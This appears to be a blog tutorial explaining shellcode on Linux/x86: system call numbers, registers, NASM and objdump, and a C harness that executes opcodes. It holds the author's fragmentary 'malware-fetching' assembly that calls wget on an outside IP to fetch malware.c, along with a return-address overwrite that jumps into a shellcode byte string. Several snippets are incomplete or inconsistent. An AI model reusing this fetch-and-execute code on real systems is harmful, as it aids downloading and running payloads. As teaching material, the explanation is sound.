Over the last couple of years I’ve discussed ways of getting malware onto a network, and basically what could be achieved after vulnerabilities are exploited. I haven’t gone into the granular details of how the exploits themselves work, and this is something I must get a handle on, one way or another.
I’ve started by asking ‘What is shellcode?’ According to Wikipedia: ‘shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.’
I suppose a classic example of this would be a buffer overflow: data written past the end of a buffer overwrites adjacent memory (typically a saved return address), and execution is redirected to the shellcode carried in with that data. For this to happen, there must be a vulnerability, and an exploit must be created to set things up for the shellcode to execute.
Assembler coding is something I haven’t touched since my microelectronics days with the Motorola 68000. Disassembling a random Sysinternals binary (as an example) gives output that, on the surface, looks almost unintelligible to most of us:
However, it only looks mystifying because it lacks context on its own. Let’s create some context by noting two features of the language:
* Very limited vocabulary. Assembler code is created with only a handful of commands (add, sub, mov, etc.) each representing a circuit within the microprocessor that performs a specific operation with whatever values are passed to it.
* Each register (EAX, ECX or whatever) is basically a small ‘buffer’ inside the microprocessor itself. The outside world (memory chips, I/O ports, pretty flashing LEDs, etc.) is reached by instructions that move values between registers and memory or I/O addresses. It follows that a value moved from a register to an address mapped to an I/O port will result in a given output.
Shellcoding for the Linux/x86 Architecture
This principle is best illustrated with shellcode created for a Linux system, as there is a definite set of system calls mapped to specific values in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register the call number is stored in at runtime (in this case EAX). Meanwhile, the arguments/parameters for a system call are stored, in order, in registers EBX, ECX, EDX, ESI, EDI and EBP. I haven’t the slightest idea what the equivalent is for a Windows operating system.
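To make the number-to-call mapping a bit more concrete, here is a minimal C sketch, assuming a Linux system with glibc. It uses the `syscall()` wrapper, which takes the system call number first and the arguments after it, much as the assembly puts the number in EAX and the arguments in the other registers. The helper name `pid_via_syscall_number` is made up for illustration, and the numeric value behind `SYS_getpid` depends on the architecture the program is compiled for.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_* constants, derived from the kernel's unistd.h */
#include <sys/types.h>
#include <unistd.h>        /* syscall(), getpid() */

/* Hypothetical helper: ask the kernel for our PID by system call number
 * instead of going through the usual getpid() wrapper. */
long pid_via_syscall_number(void)
{
    long pid = syscall(SYS_getpid);   /* number first, arguments (none here) after */
    assert(pid > 0);                  /* getpid cannot fail */
    return pid;
}
```

Calling `pid_via_syscall_number()` should return the same value as `getpid()`, since both end up in the same kernel routine.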
With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site:
mov eax, 11
mov edx, 0
It places the value 11 in register EAX, which selects the execve() system call in asm-i386/unistd.h. Next, the code places ‘cmd’ as an argument in EBX and ‘file’ in ECX. The ‘push’ instructions only put values on the stack; it’s the ‘int 80h’ that actually triggers the call, raising a software interrupt that switches from user space to the kernel, which then runs the system call selected by EAX with the values in the other registers as arguments.
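For comparison, this is roughly what the same request looks like from C. On i386, call number 11 is execve(), whose three arguments (path, argument vector, environment) correspond to EBX, ECX and EDX. The sketch below is only an illustration under my own assumptions: the helper name `run_with_execve` is hypothetical, it assumes `/bin/sh` exists, and it forks first so the calling program survives, because execve() replaces the process that calls it.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run `/bin/sh -c <command>` in a child process via
 * execve() and return the child's exit status, or -1 on error. */
int run_with_execve(const char *command)
{
    assert(command != NULL);

    pid_t child = fork();
    if (child < 0)
        return -1;

    if (child == 0) {
        /* In the i386 convention: EBX = path, ECX = argv, EDX = envp. */
        char *const argv[] = { "sh", "-c", (char *)command, NULL };
        char *const envp[] = { NULL };
        execve("/bin/sh", argv, envp);
        _exit(127);   /* only reached if execve() itself failed */
    }

    int status = 0;
    if (waitpid(child, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For example, `run_with_execve("exit 7")` hands the command to the shell in the child and reports the shell's exit status back to the caller.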
But Wait! There’s More!
Our shellcode does nothing on its own, as it’s not a binary/executable. The latter must be in a specific format (ELF) in order for a UNIX system to execute it, with a data section and a text section. And just to make things more complicated, the values in our shellcode are mapped to other command arguments in the data section, as my own little malware-fetching example shows:
;/bin/cat /etc/getmalware
section .data
get db '/bin/wget', 0
file db '22.214.171.124/malware.c'
mov eax, 203
mov edx, 0
Getting the Payload to Execute
Another problem is we can’t get the shellcode to execute unless it’s already in a buffer with the system’s instruction pointer pointing at it (which should happen after a buffer overflow). What’s needed is a C program that buffers and executes its opcode.
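As a rough idea of what such a program can look like, here is a sketch of a small test harness. It is not the return-address trick: it swaps in a different and more explicit technique, copying the bytes into memory obtained from `mmap()`, marking that memory executable with `mprotect()`, and calling it through a function pointer. The names `run_machine_code` and `return_42` are hypothetical, the sample bytes are a harmless x86 stub (`mov eax, 42` followed by `ret`), and the whole thing assumes Linux on an x86 processor.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: copy `len` bytes of machine code into fresh memory,
 * make that memory executable, call it as `int f(void)` and return the
 * result. Returns -1 if the memory cannot be set up. */
int run_machine_code(const unsigned char *code, size_t len)
{
    assert(code != NULL && len > 0);

    /* Start with a writable (not yet executable) anonymous mapping. */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    memcpy(mem, code, len);

    /* Flip the mapping to read + execute before jumping into it. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }

    int (*entry)(void) = (int (*)(void))mem;
    int result = entry();

    munmap(mem, len);
    return result;
}

/* x86 only (assumption): mov eax, 42 ; ret */
static const unsigned char return_42[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
```

On an x86 Linux machine, `run_machine_code(return_42, sizeof return_42)` should hand back whatever the stub leaves in EAX. Systems that forbid executable anonymous memory will make the helper return -1 instead.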
I’ve used the Netwide Assembler (NASM), which can generate object code in several formats (here ELF, for Linux), then used objdump (part of the GNU binutils package) to get the opcodes.
To assemble the code:
$ nasm -f elf Malware-Fetch.asm
To dump the object code:
$ objdump -d Malware-Fetch.o
This gives us some opcodes in the second column of the output, which are reformatted and put into a little C container that should look something like:
char shellcode[] = "\x2f\x62\x69\x6e\x2f\x77\x67\x65\x74\x00\x31\x39\x32"
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
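The reformatting step (turning the hex bytes from objdump into a C string of `\x..` escapes) is tedious by hand, so here is a small sketch of a helper that does it. The function name `format_as_c_escapes` and its interface are my own invention for illustration, not part of any tool mentioned here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write `len` bytes into `out` as text of the form
 * \x2f\x62... suitable for pasting into a C string literal.
 * Returns the number of characters written (not counting the NUL),
 * or -1 if `out` is too small. */
int format_as_c_escapes(const unsigned char *bytes, size_t len,
                        char *out, size_t out_size)
{
    assert(bytes != NULL && out != NULL);

    /* Each byte becomes four characters: '\', 'x' and two hex digits. */
    if (out_size < len * 4 + 1)
        return -1;

    for (size_t i = 0; i < len; i++)
        snprintf(out + i * 4, 5, "\\x%02x", bytes[i]);

    out[len * 4] = '\0';
    return (int)(len * 4);
}
```

Fed the first four bytes of the string above (0x2f, 0x62, 0x69, 0x6e), it fills the output buffer with the sixteen characters `\x2f\x62\x69\x6e`.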